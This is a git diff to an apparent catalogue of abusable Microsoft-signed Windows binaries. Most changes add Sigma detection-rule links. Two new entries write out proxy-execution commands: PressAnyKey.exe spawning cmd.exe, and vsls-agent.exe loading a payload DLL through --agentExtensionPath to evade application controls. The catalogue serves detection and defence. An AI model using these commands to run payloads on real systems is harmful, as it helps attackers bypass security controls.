- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml
index 0a81660..5b55e35 100644
--- a/yml/OtherMSBinaries/FsiAnyCpu.yml
+++ b/yml/OtherMSBinaries/FsiAnyCpu.yml
@@ -25,6 +25,7 @@ Code_Sample:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml
index 93c0440..ecc1967 100644
--- a/yml/OtherMSBinaries/Mftrace.yml
+++ b/yml/OtherMSBinaries/Mftrace.yml
@@ -26,6 +26,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml
Resources:
- Link: https://twitter.com/0rbz_/status/988911181422186496
Acknowledgement:
diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
new file mode 100644
index 0000000..896d921
--- /dev/null
+++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
@@ -0,0 +1,21 @@
+---
+Name: Microsoft.NodejsTools.PressAnyKey.exe
+Description: Part of the NodeJS Visual Studio tools.
+Author: mr.d0x
+Created: 2022-01-20
+Commands:
+ - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
+ Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
+ Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
+ Category: Execute
+ Privileges: User
+ MitreID: T1127
+ OperatingSystem: Windows
+Full_Path:
+ - Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+ - Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
+Resources:
+ - Link: https://twitter.com/mrd0x/status/1463526834918854661
+Acknowledgement:
+ - Person: mr.d0x
+ Handle: '@mrd0x'
diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml
index d9c42af..fb2ac30 100644
--- a/yml/OtherMSBinaries/MsoHtmEd.yml
+++ b/yml/OtherMSBinaries/MsoHtmEd.yml
@@ -28,6 +28,7 @@ Full_Path:
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
diff --git a/yml/OtherMSBinaries/Mspub.yml b/yml/OtherMSBinaries/Mspub.yml
index 8ebc14f..eba4027 100644
--- a/yml/OtherMSBinaries/Mspub.yml
+++ b/yml/OtherMSBinaries/Mspub.yml
@@ -25,6 +25,7 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml
index cb0d65d..6ea1d45 100644
--- a/yml/OtherMSBinaries/Remote.yml
+++ b/yml/OtherMSBinaries/Remote.yml
@@ -32,6 +32,7 @@ Code_Sample:
- Code:
Detection:
- IOC: remote.exe process spawns
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml
Resources:
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Acknowledgement:
diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml
index 0520437..8dd0255 100644
--- a/yml/OtherMSBinaries/Squirrel.yml
+++ b/yml/OtherMSBinaries/Squirrel.yml
@@ -44,6 +44,8 @@ Full_Path:
Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml
Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889
diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml
index 1d5ee20..428d730 100644
--- a/yml/OtherMSBinaries/VSIISExeLauncher.yml
+++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml
@@ -16,6 +16,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
- IOC: VSIISExeLauncher.exe spawned an unknown process
Resources:
- Link: https://github.com/timwhitez
diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
index b2d3380..fd6d7ac 100644
--- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
+++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
@@ -1,4 +1,3 @@
----
Name: VisualUiaVerifyNative.exe
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
@@ -19,6 +18,7 @@ Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml
index b9de32f..e66ddb8 100644
--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@@ -17,6 +17,7 @@ Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml
index 11bc887..f70dd62 100644
--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@@ -31,6 +31,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml
- IOC: Suspicious Office application Internet/network traffic
Resources:
- Link: https://twitter.com/reegun21/status/1150032506504151040
diff --git a/yml/OtherMSBinaries/vsls-agent.yml b/yml/OtherMSBinaries/vsls-agent.yml
new file mode 100644
index 0000000..cb4ea0f
--- /dev/null
+++ b/yml/OtherMSBinaries/vsls-agent.yml
@@ -0,0 +1,22 @@
+---
+Name: vsls-agent.exe
+Description: Agent for Visual Studio Live Share (Code Collaboration)
+Author: Jimmy (@bohops)
+Created: 2022-11-01
+Commands:
+ - Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
+ Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
+ Usecase: Execute proxied payload with Microsoft signed binary
+ Category: Execute
+ Privileges: User
+ MitreID: T1218
+ OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
+Full_Path:
+ - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
+Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml
+Resources:
+ - Link: https://twitter.com/bohops/status/1583916360404729857
+Acknowledgement:
+ - Person: Jimmy
+ Handle: '@bohops'
+
+